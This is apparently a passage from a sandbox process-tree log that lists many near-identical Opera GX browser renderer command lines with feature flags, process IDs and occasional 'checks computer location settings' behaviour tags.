C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=71 --field-trial-handle=6660,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=3272 /prefetch:12⤵
- Checks computer location settings
PID:5244
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=72 --field-trial-handle=5332,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=6108 /prefetch:12⤵PID:6644
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --start-stack-profiler --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=73 --field-trial-handle=6672,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=5396 /prefetch:12⤵PID:5364
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=74 --field-trial-handle=3024,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=8032 /prefetch:12⤵PID:6588
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=75 --field-trial-handle=3688,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=3080 /prefetch:12⤵PID:5692
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --start-stack-profiler --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=76 --field-trial-handle=7156,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=3052 /prefetch:12⤵PID:7588
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=77 --field-trial-handle=6528,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=9152 /prefetch:12⤵PID:808
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=78 --field-trial-handle=7996,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=8504 /prefetch:12⤵
- Checks computer location settings
PID:5932
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=79 --field-trial-handle=8560,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=6180 /prefetch:12⤵PID:4564
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=80 --field-trial-handle=6996,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=5152 /prefetch:12⤵PID:5976
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=81 --field-trial-handle=8508,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=7396 /prefetch:12⤵PID:7056
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=82 --field-trial-handle=2692,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=7272 /prefetch:12⤵PID:2232
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=83 --field-trial-handle=7744,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=8004 /prefetch:12⤵
- Checks computer location settings
PID:6736
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=84 --field-trial-handle=6764,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=2948 /prefetch:12⤵PID:8012
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=85 --field-trial-handle=6500,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=3096 /prefetch:12⤵PID:7680
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --start-stack-profiler --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=86 --field-trial-handle=9048,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=9356 /prefetch:12⤵PID:7860
-
-
